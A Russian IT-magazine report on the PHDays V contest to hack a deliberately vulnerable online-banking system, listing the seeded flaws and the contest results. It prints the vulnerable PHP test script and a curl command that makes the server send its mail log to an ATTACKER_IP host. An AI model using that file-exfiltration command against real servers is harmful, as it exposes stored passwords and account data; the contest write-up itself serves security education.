Как на PHDays V взламывали систему ДБО

Поиск по сайту

bit.samag.ru

Web

Рассылка Subscribe.ru

подписаться письмом

Вход в систему


Запомнить меня
Регистрация Забыли пароль?

О журнале

Ваше мнение

Статьи

Общие тенденции и тренды

Архив

Мероприятия

Календарь мероприятий

январь

2025

показать все

Новости партнеров

14.01.2025

RED Security SOC: хакеры усилили давление на критическую информационную инфраструктуру России

14.01.2025

«Газинформсервис» занял 2-ое место в списке поставщиков решений для защиты информации в РФ

27.12.2024

РАЭК определила лидера среди классифайдов по числу объявлений о долгосрочной аренде

26.12.2024

За экспертизой в инфобезе — к «Газинформсервису»

26.12.2024

Компания «ИнфоТеКС» объявляет о выпуске сертифицированной версии ViPNet xFirewall 5.6.2

показать все

Статьи

13.01.2025

Как управлять командой разработчиков в условиях постоянных изменений?

13.01.2025

Как привлекать ИТ-таланты в условиях дефицита кадров?

12.01.2025

Импортозамещение платформ серверной виртуализации

12.12.2024

Что следует учитывать ИТ-директорам, прежде чем претендовать на должность генерального директора?

11.12.2024

Сетевая инфраструктура, сетевые технологии: что лучше – самостоятельная поддержка или внешнее обслуживание?

13.06.2024

Взгляд в перспективу: что будет двигать отрасль информационной безопасности

18.04.2024

5 способов повысить безопасность электронной подписи

18.04.2024

Как искусственный интеллект изменит экономику

18.04.2024

Неочевидный САПР: выход ПО за рамки конструкторской деятельности

показать все

Как на PHDays V взламывали систему ДБО

Главная / Новости партнеров / Как на PHDays V взламывали систему ДБО

В рамках состоявшегося в Москве форума по информационной безопасности Positive Hack Days V прошел традиционный конкурс по анализу защищенности систем ДБО «Большой ку$h».

В рамках состоявшегося в Москве 26 и 27 мая форума по информационной безопасности Positive Hack Days V прошел традиционный конкурс по анализу защищенности систем ДБО «Большой ку$h». Соревнование проходило в два этапа: сначала участникам были предоставлены копии виртуальных машин, содержащие уязвимые веб-сервисы ДБО, аналогичные реальным системам. На втором этапе за один час участники должны были воспользоваться проблемами безопасности, обнаруженными при анализе образа системы ДБО, и перевести деньги из банка на свой счет.

В этом году отдельные конкурсы стали частью CTF (подробнее в нашей статье на Хабрахабре), и, наряду с гостями форума, участвовать в соревнованиях могли CTF-команды. Общее число участников конкурса составило порядка 30 человек, а призовой фонд в этом году увеличился до 40 тысяч рублей (в прошлом году можно было «украсть» 20 тысяч).

Технические подробности

Специально для конкурса «Большой ку$h» была разработана система ДБО PHDays iBank, содержащая уязвимости, которые встречаются в реальных банковских системах. В этот раз система была разделена на две части — frontend и backend, предоставляющий простейший RESTful API. Поэтому участникам было необходимо ознакомиться еще и с протоколом взаимодействия частей ДБО.

Как правило, в системах ДБО присутствуют не «топорные» ошибки безопасности, позволяющие провести прямую атаку с внедрением или исполнением зловредного кода, а логические уязвимости (слабые проверки, приводящие к утечке важных данных). Именно на них сделан акцент в конкурсной системе ДБО.

В PHDays iBank было заложено 7 комбинаций уязвимостей, на каждую комбинацию приходилось по 10 банковских счетов виртуальных пользователей, на которых хранились деньги (чем сложнее уязвимость, тем больше денег на счете).

Участники могли проводить следующие атаки:

брутфорс по спискам самых популярных паролей, доступных в Сети;

взлом аккаунтов с подключенной двухфакторной авторизацией (обход проверок);
эксплуатация уязвимостей в алгоритмах сброса паролей;
взаимодействие с тестовым сценарием, использовавшимся для контроля работоспособности API backend (обход проверок доступа, чтение произвольных файлов);
обход защиты механизма отложенных платежей (данная атака могла быть использована и для похищения денег со счетов других конкурсантов).

Несколько уязвимостей, заложенных в систему

Тестовый сценарий содержал следующий код:

<?php

if ($_SERVER['HTTP_HOST'] != 'ibank.dev') {

exit;

}

if (empty($_GET['url'])) {

exit;

}

$parts = parse_url($_GET['url']);

$port = empty($parts['port']) ? '' : ':' . $parts['port'];

$url = "http://{$parts['host']}$port/status";

$ch = curl_init();

curl_setopt_array($ch, [

// CURLOPT_URL => $_GET['url'],

CURLOPT_URL => $url,

CURLOPT_HEADER => false,

CURLOPT_RETURNTRANSFER => true,

]);

if (!empty($_GET['params'])) {

curl_setopt_array($ch, [

CURLOPT_POST => true,

CURLOPT_POSTFIELDS => $_GET['params']

]);

}

var_dump(curl_exec($ch));

curl_close($ch);

Проверку имени хоста можно обойти. Зная про возможность передачи файлов и используя символ @ в значении параметра, можно провести следующую атаку:

curl -H 'Host: ibank.dev' 'http://SERVER_IP/api_test.php?url=http://ATTACKER_IP/&params\[a\]=@ /var/www/frontend/data/logs/mail.log'

Получив содержимое лог-файла отправленных сообщений, участник мог найти в них пароли к учетным записям, которые использовали систему восстановления пароля.

Для обхода двухфакторной аутентификации использовалась уязвимость, о которой не так давно писали на Хабре. Во время конкурса выяснилось, что не все участники были с ней знакомы, и поэтому работали по старинке, перебирая возможные значения.

Ход сражения

Участники могли не только атаковать систему ДБО, чтобы вывести средства из банка, но и атаковать счета друг друга, уводя с них деньги. Именно по этому пути пошли члены команды More Smoked Leet Chicken, которые выиграли соревнование. В итоге победителям удалось заработать более 15 тысяч рублей.

Стас Поволоцкий, ставший вторым, смог украсть из конкурсного банка более 3200 рублей.

Интересный момент: команда RDot, занявшая третье место, сумела найти и проэксплуатировать больше всех уязвимостей, однако ей не удалось защитить украденные деньги, которые были похищены с их счета командой More Smoked Leet Chicken.

Поздравляем победителей!

В начало⇑

Комментарии отсутствуют

Комментарии могут отставлять только зарегистрированные пользователи